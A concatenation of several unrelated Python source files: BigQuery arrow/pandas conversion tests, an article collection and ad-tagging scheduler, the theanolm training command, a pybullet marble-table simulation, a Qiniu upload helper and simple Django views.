schema.SchemaField("population_size", "INTEGER"),
schema.SchemaField("alien_field", "ALIEN_FLOAT_TYPE"),
]
results_gen = module_under_test.download_arrow_row_iterator(pages, bq_schema)
with warnings.catch_warnings(record=True) as warned:
result = next(results_gen)
unwanted_warnings = [
warning
for warning in warned
if "please pass schema= explicitly" in str(warning).lower()
]
assert not unwanted_warnings
assert len(result.columns) == 2
col = result.columns[0]
assert type(col) is pyarrow.lib.Int64Array
assert col.to_pylist() == [1, 10, 100]
col = result.columns[1]
assert type(col) is pyarrow.lib.DoubleArray
assert col.to_pylist() == [2.2, 22.22, 222.222]
def test_download_arrow_row_iterator_known_field_type(module_under_test):
fake_page = api_core.page_iterator.Page(
parent=mock.Mock(),
items=[{"page_data": "foo"}],
item_to_value=api_core.page_iterator._item_to_value_identity,
)
fake_page._columns = [[1, 10, 100], ["2.2", "22.22", "222.222"]]
pages = [fake_page]
bq_schema = [
schema.SchemaField("population_size", "INTEGER"),
schema.SchemaField("non_alien_field", "STRING"),
]
results_gen = module_under_test.download_arrow_row_iterator(pages, bq_schema)
with warnings.catch_warnings(record=True) as warned:
result = next(results_gen)
unwanted_warnings = [
warning
for warning in warned
if "please pass schema= explicitly" in str(warning).lower()
]
assert not unwanted_warnings
assert len(result.columns) == 2
col = result.columns[0]
assert type(col) is pyarrow.lib.Int64Array
assert col.to_pylist() == [1, 10, 100]
col = result.columns[1]
assert type(col) is pyarrow.lib.StringArray
assert col.to_pylist() == ["2.2", "22.22", "222.222"]
def test_download_arrow_row_iterator_dict_sequence_schema(module_under_test):
fake_page = api_core.page_iterator.Page(
parent=mock.Mock(),
items=[{"page_data": "foo"}],
item_to_value=api_core.page_iterator._item_to_value_identity,
)
fake_page._columns = [[1, 10, 100], ["2.2", "22.22", "222.222"]]
pages = [fake_page]
dict_schema = [
{"name": "population_size", "type": "INTEGER", "mode": "NULLABLE"},
{"name": "non_alien_field", "type": "STRING", "mode": "NULLABLE"},
]
results_gen = module_under_test.download_arrow_row_iterator(pages, dict_schema)
result = next(results_gen)
assert len(result.columns) == 2
col = result.columns[0]
assert type(col) is pyarrow.lib.Int64Array
assert col.to_pylist() == [1, 10, 100]
col = result.columns[1]
assert type(col) is pyarrow.lib.StringArray
assert col.to_pylist() == ["2.2", "22.22", "222.222"]
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_download_dataframe_row_iterator_dict_sequence_schema(module_under_test):
fake_page = api_core.page_iterator.Page(
parent=mock.Mock(),
items=[{"page_data": "foo"}],
item_to_value=api_core.page_iterator._item_to_value_identity,
)
fake_page._columns = [[1, 10, 100], ["2.2", "22.22", "222.222"]]
pages = [fake_page]
dict_schema = [
{"name": "population_size", "type": "INTEGER", "mode": "NULLABLE"},
{"name": "non_alien_field", "type": "STRING", "mode": "NULLABLE"},
]
results_gen = module_under_test.download_dataframe_row_iterator(
pages, dict_schema, dtypes={}
)
result = next(results_gen)
expected_result = pandas.DataFrame(
collections.OrderedDict(
[
("population_size", [1, 10, 100]),
("non_alien_field", ["2.2", "22.22", "222.222"]),
]
)
)
assert result.equals(expected_result)
with pytest.raises(StopIteration):
result = next(results_gen)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_table_data_listpage_to_dataframe_skips_stop_iteration(module_under_test):
dataframe = module_under_test._row_iterator_page_to_dataframe([], [], {})
assert isinstance(dataframe, pandas.DataFrame)
def test_bq_to_arrow_field_type_override(module_under_test):
# When loading pandas data, we may need to override the type
# decision based on data contents, because GEOGRAPHY data can be
# stored as either text or binary.
assert (
module_under_test.bq_to_arrow_field(schema.SchemaField("g", "GEOGRAPHY")).type
== pyarrow.string()
)
assert (
module_under_test.bq_to_arrow_field(
schema.SchemaField("g", "GEOGRAPHY"),
pyarrow.binary(),
).type
== pyarrow.binary()
)
@pytest.mark.parametrize(
"field_type, metadata",
[
("datetime", {b"ARROW:extension:name": b"google:sqlType:datetime"}),
(
"geography",
{
b"ARROW:extension:name": b"google:sqlType:geography",
b"ARROW:extension:metadata": b'{"encoding": "WKT"}',
},
),
],
)
def test_bq_to_arrow_field_metadata(module_under_test, field_type, metadata):
assert (
module_under_test.bq_to_arrow_field(
schema.SchemaField("g", field_type)
).metadata
== metadata
)
def test_verify_pandas_imports_no_pandas(module_under_test, monkeypatch):
monkeypatch.setattr(module_under_test, "pandas", None)
with pytest.raises(ValueError, match="Please install the 'pandas' package"):
module_under_test.verify_pandas_imports()
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_verify_pandas_imports_no_db_dtypes(module_under_test, monkeypatch):
monkeypatch.setattr(module_under_test, "db_dtypes", None)
with pytest.raises(ValueError, match="Please install the 'db-dtypes' package"):
module_under_test.verify_pandas_imports()
|
py | 1a3f926e41b9f70ace8c5523b8fc86f590e2e59a | #!/usr/bin/env python
"""
Created by howie.hu at 2021/4/10.
    Description: commonly used scheduling functions
    - Run: execute from the project root; choose the environment file (pro.env) according to your actual setup
    - Command: PIPENV_DOTENV_LOCATION=./pro.env pipenv run python src/schedule_task/all_tasks.py
Changelog: all notable changes to this file will be documented
"""
import time
from src.classifier import model_predict_factory
from src.collector.collect_factory import collect_factory
from src.config import Config
from src.databases import MongodbManager
from src.processor import fetch_keyword_list
from src.sender import send_factory
from src.utils.log import LOGGER
def update_wechat_doc():
"""
    Fetch the latest articles and persist them to the database.
    :return:
"""
    # TODO: manage this configuration in one central place
t_collect_type = "wechat_sougou"
t_collect_config = {
"wechat_list": Config.WECHAT_LIST,
"delta_time": 5,
# playwright
"spider_type": "playwright",
}
collect_factory(t_collect_type, t_collect_config)
def update_ads_tag(is_force=False):
"""
    Tag subscribed articles that look like advertisements.
    :param is_force: whether to force re-evaluation of articles that were already tagged
:return:
"""
mongo_base = MongodbManager.get_mongo_base(mongodb_config=Config.MONGODB_CONFIG)
coll = mongo_base.get_collection(coll_name="liuli_articles")
if is_force:
query = {}
else:
query = {"cos_model": {"$exists": False}}
    # Find articles that have not been tagged yet and judge them with the similarity model
for each_data in coll.find(query):
doc_name = each_data["doc_name"]
doc_link = each_data["doc_link"]
doc_source_name = each_data["doc_source_name"]
doc_content = each_data["doc_content"]
doc_keywords = each_data.get("doc_keywords")
if not doc_keywords:
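            # Lazily extract keywords from the article body when none are stored yet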
keyword_list = fetch_keyword_list(doc_content)
doc_keywords = " ".join(keyword_list)
each_data["doc_keywords"] = doc_keywords
        # Based on cosine similarity
cos_model_resp = model_predict_factory(
model_name="cos",
model_path="",
input_dict={"text": doc_name + doc_keywords, "cos_value": Config.COS_VALUE},
# input_dict={"text": doc_name, "cos_value": Config.COS_VALUE},
).to_dict()
each_data["cos_model"] = cos_model_resp
if cos_model_resp["result"] == 1:
            LOGGER.info(
                f"[{doc_source_name}] {doc_name} was classified as an advertisement "
                f"[probability: {cos_model_resp['probability']}], link: {each_data['doc_link']}"
            )
coll.update_one(
filter={"doc_id": each_data["doc_id"]},
update={"$set": each_data},
upsert=True,
)
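# Shape of the stored judgement (an illustration only, inferred from the
# "result" and "probability" fields used above; the full dict returned by
# model_predict_factory may contain additional keys):
#
#     each_data["cos_model"] == {"result": 1, "probability": 0.92, ...}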
def send_doc():
"""
    Distribute articles to the configured senders
:return:
"""
if Config.SENDER_LIST:
        # only distribute if at least one sender is enabled
mongo_base = MongodbManager.get_mongo_base(mongodb_config=Config.MONGODB_CONFIG)
coll = mongo_base.get_collection(coll_name="liuli_articles")
cur_ts = time.time()
filter_dict = {
            # time window; after the first run this filter could actually be dropped
"doc_ts": {"$gte": cur_ts - (2 * 24 * 60 * 60), "$lte": cur_ts},
            # at least one model tag must be present
"cos_model": {"$exists": True},
}
        # find all articles eligible for distribution
for each_data in coll.find(filter_dict):
            # distribute to each configured target
for send_type in Config.SENDER_LIST:
                # fixed for now, for testing
send_config = {}
each_data["doc_cus_des"] = "🤓非广告"
cos_model_resp = each_data["cos_model"]
if cos_model_resp["result"] == 1:
                    # advertisement marker
                    each_data[
                        "doc_cus_des"
                    ] = f"👿 Ad [probability: {cos_model_resp['probability']}]"
send_factory(
send_type=send_type, send_config=send_config, send_data=each_data
)
else:
LOGGER.info("未配置分发器!")
if __name__ == "__main__":
    # On the first run, execute:
# update_wechat_doc()
    # To force re-tagging on every run, call with is_force=True:
# update_ads_tag(is_force=False)
send_doc()
|
py | 1a3f95da831c7d2fcbdd9f410a15c1467a9401e7 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""A module that implements the "theanolm train" command.
"""
import sys
import mmap
import logging
import h5py
import numpy
import theano
from theanolm import Vocabulary, Architecture, Network
from theanolm.backend import TextFileType, get_default_device
from theanolm.parsing import LinearBatchIterator
from theanolm.training import Trainer, create_optimizer, CrossEntropyCost, \
NCECost, BlackoutCost
from theanolm.scoring import TextScorer
from theanolm.vocabulary import compute_word_counts
def add_arguments(parser):
"""Specifies the command line arguments supported by the "theanolm train"
command.
:type parser: argparse.ArgumentParser
:param parser: a command line argument parser
"""
argument_group = parser.add_argument_group("data")
argument_group.add_argument(
'model_path', metavar='MODEL-FILE', type=str,
help='path where the best model state will be saved in HDF5 binary '
'data format')
argument_group.add_argument(
'--training-set', metavar='FILE', type=TextFileType('r'), nargs='+',
required=True,
help='text files containing training data (UTF-8, one sentence per '
'line, assumed to be compressed if the name ends in ".gz")')
argument_group.add_argument(
'--validation-file', metavar='VALID-FILE', type=TextFileType('r'),
default=None,
help='text file containing validation data for early stopping (UTF-8, '
'one sentence per line, assumed to be compressed if the name ends '
'in ".gz")')
argument_group = parser.add_argument_group("vocabulary")
argument_group.add_argument(
'--vocabulary', metavar='FILE', type=str, default=None,
help='word or class vocabulary to be used in the neural network input '
'and output, in the format specified by the --vocabulary-format '
'argument (UTF-8 text, default is to use all the words from the '
'training data)')
argument_group.add_argument(
'--vocabulary-format', metavar='FORMAT', type=str, default='words',
choices=['words', 'classes', 'srilm-classes'],
help='format of the file specified with --vocabulary argument, one of '
'"words" (one word per line, default), "classes" (word and class '
'ID per line), "srilm-classes" (class name, membership '
'probability, and word per line)')
argument_group.add_argument(
'--num-classes', metavar='N', type=int, default=None,
help='generate N classes using a simple word frequency based algorithm '
'when --vocabulary argument is not given (default is to not use '
'word classes)')
argument_group = parser.add_argument_group("network architecture")
argument_group.add_argument(
'--architecture', metavar='FILE', type=str, default='lstm300',
help='path to neural network architecture description, or a standard '
'architecture name, "lstm300" or "lstm1500" (default "lstm300")')
argument_group = parser.add_argument_group("training process")
argument_group.add_argument(
'--sampling', metavar='FRACTION', type=float, nargs='*', default=[],
help='randomly sample only FRACTION of each training file on each '
'epoch (list the fractions in the same order as the training '
'files)')
argument_group.add_argument(
'--sequence-length', metavar='N', type=int, default=100,
help='ignore sentences longer than N words (default 100)')
argument_group.add_argument(
'--batch-size', metavar='N', type=int, default=16,
help='each mini-batch will contain N sentences (default 16)')
argument_group.add_argument(
        '--validation-frequency', metavar='N', type=int, default=5,
help='cross-validate for reducing learning rate or early stopping N '
'times per training epoch (default 5)')
argument_group.add_argument(
'--patience', metavar='N', type=int, default=4,
help='allow perplexity to increase N consecutive cross-validations, '
'before decreasing learning rate; if less than zero, never '
'decrease learning rate (default 4)')
argument_group.add_argument(
'--random-seed', metavar='N', type=int, default=None,
help='seed to initialize the random state (default is to seed from a '
             'random source provided by the operating system)')
argument_group = parser.add_argument_group("optimization")
argument_group.add_argument(
'--optimization-method', metavar='NAME', type=str, default='adagrad',
choices=['sgd', 'nesterov', 'adagrad', 'adadelta', 'rmsprop-sgd',
'rmsprop-nesterov', 'adam'],
help='optimization method, one of "sgd", "nesterov", "adagrad", '
'"adadelta", "rmsprop-sgd", "rmsprop-nesterov", "adam" '
'(default "adagrad")')
argument_group.add_argument(
'--learning-rate', metavar='ALPHA', type=float, default=0.1,
help='initial learning rate (default 0.1)')
argument_group.add_argument(
'--l1-regularization', metavar='LAMBDA', type=float, default=None,
help='add L1 regularization term with weight LAMBDA to the cost')
argument_group.add_argument(
'--l2-regularization', metavar='LAMBDA', type=float, default=None,
help='add L2 regularization term with weight LAMBDA to the cost')
argument_group.add_argument(
'--momentum', metavar='BETA', type=float, default=0.9,
help='momentum coefficient for momentum optimization methods (default '
'0.9)')
argument_group.add_argument(
'--gradient-decay-rate', metavar='GAMMA', type=float, default=0.9,
help='geometric rate for averaging gradients (default 0.9)')
argument_group.add_argument(
'--sqr-gradient-decay-rate', metavar='GAMMA', type=float, default=0.999,
help='geometric rate for averaging squared gradients in Adam optimizer '
'(default 0.999)')
argument_group.add_argument(
'--numerical-stability-term', metavar='EPSILON', type=float,
default=1e-6,
help='a value that is used to prevent instability when dividing by '
'very small numbers (default 1e-6)')
argument_group.add_argument(
'--gradient-normalization', metavar='THRESHOLD', type=float,
default=5,
help='scale down the gradients if necessary to make sure their norm '
'(normalized by mini-batch size) will not exceed THRESHOLD '
'(default 5)')
argument_group.add_argument(
'--cost', metavar='NAME', type=str, default='cross-entropy',
choices=['cross-entropy', 'nce', 'blackout'],
help='cost function, one of "cross-entropy" (default), "nce" '
'(noise-contrastive estimation), or "blackout"')
argument_group.add_argument(
'--num-noise-samples', metavar='K', type=int, default=5,
help='sampling based costs sample K noise words per one training word '
'(default 5)')
argument_group.add_argument(
'--noise-distribution', metavar='DIST', type=str, default='uniform',
choices=['uniform', 'log-uniform', 'unigram'],
help='sample noise from DIST; one of "uniform" (default, but less '
'accurate), "log-uniform" (the vocabulary should be ordered by '
'decreasing frequency), "unigram" (unigram distribution of words '
'in training data, slow)')
argument_group.add_argument(
'--noise-dampening', metavar='ALPHA', type=float, default=0.5,
help='the empirical unigram distribution is raised to the power ALPHA '
'before sampling noise words; 0.0 corresponds to the uniform '
'distribution and 1.0 corresponds to the unigram distribution '
'(only applicable with --noise-distribution=unigram, default 0.5)')
argument_group.add_argument(
'--noise-sharing', metavar='SHARING', type=str, default=None,
choices=['seq', 'batch', None],
help='can be "seq" for sharing noise samples between mini-batch '
'sequences, or "batch" for sharing noise samples across einter '
'mini-batch for improved speed (default is no sharing, which is '
'very slow)')
argument_group.add_argument(
'--exclude-unk', action="store_true",
help="exclude <unk> tokens from cost and perplexity computations")
argument_group.add_argument(
'--weights', metavar='LAMBDA', type=float, nargs='*', default=[],
help='scale a mini-batch update by LAMBDA if the data is from the '
'corresponding training file (list the weights in the same order '
'as the training files)')
argument_group = parser.add_argument_group("early stopping")
argument_group.add_argument(
'--stopping-criterion', metavar='NAME', type=str,
default='annealing-count',
choices=['epoch-count', 'no-improvement', 'annealing-count'],
help='selects a criterion for early-stopping, one of "epoch-count" '
'(fixed number of epochs), "no-improvement" (no improvement since '
'learning rate was decreased), "annealing-count" (default, '
'learning rate is decreased a fixed number of times)')
argument_group.add_argument(
'--min-epochs', metavar='N', type=int, default=1,
help='perform at least N training epochs (default 1)')
argument_group.add_argument(
'--max-epochs', metavar='N', type=int, default=100,
help='perform at most N training epochs (default 100)')
argument_group.add_argument(
'--max-annealing-count', metavar='N', type=int, default=0,
help='when using annealing-count stopping criterion, continue training '
'after decreasing learning rate at most N times (default 0)')
argument_group = parser.add_argument_group("configuration")
argument_group.add_argument(
'--default-device', metavar='DEVICE', type=str, default=None,
help='when multiple GPUs are present, use DEVICE as default')
argument_group = parser.add_argument_group("logging and debugging")
argument_group.add_argument(
'--log-file', metavar='FILE', type=str, default='-',
help='path where to write log file (default is standard output)')
argument_group.add_argument(
'--log-level', metavar='LEVEL', type=str, default='info',
choices=['debug', 'info', 'warn'],
help='minimum level of events to log, one of "debug", "info", "warn" '
'(default "info")')
argument_group.add_argument(
'--log-interval', metavar='N', type=int, default=1000,
help='print statistics of every Nth mini-batch update; quiet if less '
'than one (default 1000)')
argument_group.add_argument(
'--debug', action="store_true",
help='use test values to get better error messages from Theano')
argument_group.add_argument(
'--print-graph', action="store_true",
help='print Theano computation graph')
argument_group.add_argument(
'--profile', action="store_true",
help='enable profiling Theano functions')
argument_group.add_argument(
'--load-and-train', action="store_true",
help='load the weight matrices from the MODEL and retrain')
def _read_vocabulary(args, state):
"""If ``state`` contains data, reads the vocabulary from the HDF5 state.
Otherwise reads a vocabulary file or constructs the vocabulary from the
training set and writes it to the HDF5 state.
If the state does not contain data and --vocabulary argument is given, reads
the vocabulary from the file given after the argument. The rest of the words
in the training set will be added as out-of-shortlist words.
If the state does not contain data and no vocabulary is given, constructs a
vocabulary that contains all the training set words. In that case,
--num-classes argument can be used to control the number of classes.
:type args: argparse.Namespace
:param args: a collection of command line arguments
:type state: hdf5.File
:param state: HDF5 file where the vocabulary should be saved
:rtype: Vocabulary
:returns: the created vocabulary
"""
if state.keys():
logging.info("Reading vocabulary from existing network state.")
result = Vocabulary.from_state(state)
if not result.has_unigram_probs():
# This is for backward compatibility. Remove at some point.
logging.info("Computing unigram word probabilities from training "
"set.")
word_counts = compute_word_counts(args.training_set)
shortlist_words = list(result.id_to_word)
shortlist_set = set(shortlist_words)
oos_words = [x for x in word_counts.keys()
if x not in shortlist_set]
result.id_to_word = numpy.asarray(shortlist_words + oos_words,
dtype=object)
result.word_to_id = {word: word_id
for word_id, word in enumerate(result.id_to_word)}
result.compute_probs(word_counts, update_class_probs=False)
result.get_state(state)
elif args.vocabulary is None:
logging.info("Constructing vocabulary from training set.")
word_counts = compute_word_counts(args.training_set)
result = Vocabulary.from_word_counts(word_counts, args.num_classes)
result.get_state(state)
else:
logging.info("Reading vocabulary from %s.", args.vocabulary)
word_counts = compute_word_counts(args.training_set)
oos_words = word_counts.keys()
with open(args.vocabulary, 'rt', encoding='utf-8') as vocab_file:
result = Vocabulary.from_file(vocab_file,
args.vocabulary_format,
oos_words=oos_words)
if args.vocabulary_format == 'classes':
logging.info("Computing class membership probabilities and unigram "
"probabilities for out-of-shortlist words.")
update_class_probs = True
else:
logging.info("Computing unigram probabilities for out-of-shortlist "
"words.")
update_class_probs = False
result.compute_probs(word_counts,
update_class_probs=update_class_probs)
result.get_state(state)
logging.info("Number of words in vocabulary: %d",
result.num_words())
logging.info("Number of words in shortlist: %d",
result.num_shortlist_words())
logging.info("Number of word classes: %d",
result.num_classes())
return result
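# Vocabulary file line formats (illustrative examples only, derived from the
# --vocabulary-format help text above; the word, class ID, and probability are
# placeholders):
#
#     words:          cat
#     classes:        cat 17
#     srilm-classes:  CLASS17 0.25 cat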
def log_options(training_options, optimization_options, args):
"""Writes the command line arguments to debug log.
"""
logging.debug("Training options:")
for option_name, option_value in sorted(training_options.items()):
logging.debug(" %s: %s", option_name, str(option_value))
logging.debug("Optimization options:")
for option_name, option_value in sorted(optimization_options.items()):
logging.debug(" %s=%s", option_name, str(option_value))
logging.debug(" cost_function=%s", args.cost)
logging.debug(" noise_distribution=%s", args.noise_distribution)
logging.debug(" noise_dampening=%d", args.noise_dampening)
logging.debug(" noise_sharing=%s", args.noise_sharing
if args.noise_sharing is not None
else 'no')
logging.debug(" exclude_unk=%s", 'yes' if args.exclude_unk else 'no')
logging.debug(" l1_regularization=%f", args.l1_regularization
if args.l1_regularization is not None
else 0.0)
logging.debug(" l2_regularization=%f", args.l2_regularization
if args.l2_regularization is not None
else 0.0)
logging.debug("Data sampling: %s", str(numpy.array(args.sampling)))
def train(args):
"""A function that performs the "theanolm train" command.
:type args: argparse.Namespace
:param args: a collection of command line arguments
"""
numpy.random.seed(args.random_seed)
log_file = args.log_file
log_level = getattr(logging, args.log_level.upper(), None)
if not isinstance(log_level, int):
print("Invalid logging level requested:", args.log_level)
sys.exit(1)
log_format = '%(asctime)s %(funcName)s: %(message)s'
if args.log_file == '-':
logging.basicConfig(stream=sys.stdout, format=log_format, level=log_level)
else:
logging.basicConfig(filename=log_file, format=log_format, level=log_level)
if args.debug:
theano.config.compute_test_value = 'warn'
logging.info("Enabled computing test values for tensor variables.")
logging.warning("GpuArray backend will fail random number generation!")
else:
theano.config.compute_test_value = 'off'
theano.config.profile = args.profile
theano.config.profile_memory = args.profile
with h5py.File(args.model_path, 'a', driver='core') as state:
vocabulary = _read_vocabulary(args, state)
if args.num_noise_samples > vocabulary.num_classes():
print("Number of noise samples ({}) is larger than the number of "
"classes. This doesn't make sense and would cause unigram "
"sampling to fail.".format(args.num_noise_samples))
sys.exit(1)
num_training_files = len(args.training_set)
if len(args.weights) > num_training_files:
print("You specified more weights than training files.")
sys.exit(1)
weights = numpy.ones(num_training_files).astype(theano.config.floatX)
for index, weight in enumerate(args.weights):
weights[index] = weight
if len(args.sampling) > num_training_files:
print("You specified more sampling coefficients than training "
"files.")
sys.exit(1)
training_options = {
'batch_size': args.batch_size,
'sequence_length': args.sequence_length,
'validation_frequency': args.validation_frequency,
'patience': args.patience,
'stopping_criterion': args.stopping_criterion,
'max_epochs': args.max_epochs,
'min_epochs': args.min_epochs,
'max_annealing_count': args.max_annealing_count
}
optimization_options = {
'method': args.optimization_method,
'epsilon': args.numerical_stability_term,
'gradient_decay_rate': args.gradient_decay_rate,
'sqr_gradient_decay_rate': args.sqr_gradient_decay_rate,
'learning_rate': args.learning_rate,
'weights': weights,
'momentum': args.momentum,
'max_gradient_norm': args.gradient_normalization,
'num_noise_samples': args.num_noise_samples,
'noise_sharing': args.noise_sharing,
}
log_options(training_options, optimization_options, args)
logging.info("Creating trainer.")
trainer = Trainer(training_options, vocabulary, args.training_set,
args.sampling)
trainer.set_logging(args.log_interval)
logging.info("Building neural network.")
if args.architecture == 'lstm300' or args.architecture == 'lstm1500':
architecture = Architecture.from_package(args.architecture)
else:
with open(args.architecture, 'rt', encoding='utf-8') as arch_file:
architecture = Architecture.from_description(arch_file)
default_device = get_default_device(args.default_device)
network = Network(architecture, vocabulary, trainer.class_prior_probs,
default_device=default_device,
profile=args.profile)
network.set_sampling(args.noise_distribution, args.noise_dampening,
args.noise_sharing)
logging.info("Building optimizer.")
exclude_id = vocabulary.word_to_id['<unk>'] if args.exclude_unk \
else None
epsilon = args.numerical_stability_term
if args.cost == 'cross-entropy':
cost_function = CrossEntropyCost(network, exclude_id,
args.l1_regularization,
args.l2_regularization, epsilon)
elif args.cost == 'nce':
cost_function = NCECost(network, exclude_id, args.l1_regularization,
args.l2_regularization, epsilon)
else:
assert args.cost == 'blackout'
cost_function = BlackoutCost(network, exclude_id,
args.l1_regularization,
args.l2_regularization, epsilon)
try:
optimizer = create_optimizer(optimization_options, network,
cost_function, profile=args.profile)
except theano.gradient.DisconnectedInputError as e:
print("Cannot train the neural network because some of the "
"parameters are disconnected from the output. Make sure all "
"the layers are correctly connected in the network "
"architecture. The error message was: `{}´".format(e))
if args.print_graph:
print("Cost function computation graph:")
theano.printing.debugprint(optimizer.gradient_update_function)
trainer.initialize(network, state, optimizer, args.load_and_train)
if args.validation_file is not None:
logging.info("Building text scorer for cross-validation.")
scorer = TextScorer(network, use_shortlist=True,
exclude_unk=args.exclude_unk,
profile=args.profile)
logging.info("Validation text: %s", args.validation_file.name)
validation_mmap = mmap.mmap(args.validation_file.fileno(),
0,
prot=mmap.PROT_READ)
validation_iter = \
LinearBatchIterator(validation_mmap,
vocabulary,
batch_size=args.batch_size,
max_sequence_length=args.sequence_length,
map_oos_to_unk=False)
trainer.set_validation(validation_iter, scorer)
else:
logging.info("Cross-validation will not be performed.")
validation_iter = None
logging.info("Training neural network.")
trainer.train()
if 'layers' not in state.keys():
print("The model has not been trained. No cross-validations were "
"performed or training did not improve the model.")
elif validation_iter is not None:
network.set_state(state)
perplexity = scorer.compute_perplexity(validation_iter)
print("Best validation set perplexity:", perplexity)
|
py | 1a3f9620319bdc533748190bd7a3ad8cf08805bd | from rbw import np
from . import Sim
# TODO document gravity
class MarbleSim(Sim):
"""
Handles physics for `rbw.shapes.MarbleWorld`
Objects with an initial velocity are configured.
    Defines a method `make_table` to describe a table top with boundaries along each edge.
"""
def __init__(self, scene_json, client):
self.client = client
self.world = scene_json
#-------------------------------------------------------------------------#
# Attributes
@property
def client(self):
return self._client
@client.setter
def client(self, cid):
if cid < 0:
raise ValueError('Client is offline')
self._client = cid
@property
def world(self):
return self._world
@world.setter
def world(self, w):
self.resetSimulation()
self.setGravity(0, 0, -10)
self.make_table(w['table'])
init_force = w['init_force']
d = {}
for obj,data in w['objects'].items():
d[obj] = self.make_obj(data)
if obj in w['init_force']:
f = init_force[obj]
                self.applyExternalForce(d[obj], -1, f, [0, 0, 0], self.LINK_FRAME)
self._world = d
#-------------------------------------------------------------------------#
# Methods
def make_table(self, params):
# Table top
base_id = self.make_obj(params)
# table walls
shape = self.GEOM_BOX
exs = np.array(params['dims']) / 2.0
rot = self.getQuaternionFromEuler((np.pi/2, 0, 0))
wall_left = self.createCollisionShape(shape, halfExtents = exs)
pos_left = [0, exs[1] + exs[2], 0]
obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_left,
basePosition = pos_left,
baseOrientation = rot)
self.update_obj(obj_id, params)
pos_right = [0, -1 * (exs[1] + exs[2]), 0]
wall_right = self.createCollisionShape(shape, halfExtents = exs)
obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_right,
basePosition = pos_right,
baseOrientation = rot)
self.update_obj(obj_id, params)
pos_front = [(exs[1] + exs[2]), 0, 0]
rot = self.getQuaternionFromEuler((0, np.pi/2, 0))
wall_front = self.createCollisionShape(shape, halfExtents = exs)
obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_front,
basePosition = pos_front,
baseOrientation = rot,)
self.update_obj(obj_id, params)
pos_back = [-1*(exs[1] + exs[2]), 0, 0]
wall_back = self.createCollisionShape(shape, halfExtents = exs)
obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_back,
basePosition = pos_back,
baseOrientation = rot,)
self.update_obj(obj_id, params)
return base_id
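# Usage sketch (hypothetical; the scene layout is inferred from the `world`
# setter above, and the client id comes from the surrounding rbw/pybullet
# plumbing, which is not part of this file):
#
#     scene = {
#         "table": {...},                          # table-top shape parameters
#         "objects": {"marble": {...}},            # objects keyed by name
#         "init_force": {"marble": [5.0, 0.0, 0.0]},
#     }
#     sim = MarbleSim(scene, client_id)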
|
py | 1a3f976dae6edfce0061348c37c99d309ccd9008 | from qiniu import Auth, put_file
from common import config
def upload(file_name, file_path):
"""
    Upload a local file to Qiniu Cloud object storage
    :param file_name: key (object name) under which the file is stored in the bucket
    :param file_path: path of the local file to upload
    :return: the (ret, info) tuple returned by qiniu's put_file
"""
# 构建鉴权对象
qn_auth = Auth(config.QN_ACCESS_KEY, config.QN_SECRET_KEY)
# 生成上传 Token,可以指定过期时间等
token = qn_auth.upload_token(config.QN_BUCKET_NAME, file_name, 3600)
ret, info = put_file(token, file_name, file_path)
return ret, info
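if __name__ == "__main__":
    # Smoke-test sketch (not part of the original module): the key and local
    # path below are placeholders, and valid credentials must be present in
    # common.config for the request to succeed.
    ret, info = upload("examples/hello.txt", "./hello.txt")
    print(ret, info)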
|
py | 1a3f978c11f5c545982fb5039dd1cc57dfacaa46 | from django.http import HttpResponse
from django.shortcuts import render
def handle_not_fonud(request, exception=None):
"""Handler for 404"""
return render(request, '404.html', status=404)
def health(request):
"""Health Check API"""
return HttpResponse('ok')
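# Wiring sketch (an assumption, not from the original project): in the root
# urls.py these views would typically be registered roughly as follows, with
# the module path adjusted to the real app name.
#
#     from django.urls import path
#     from app import views
#
#     handler404 = "app.views.handle_not_fonud"
#     urlpatterns = [path("health/", views.health, name="health")]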
|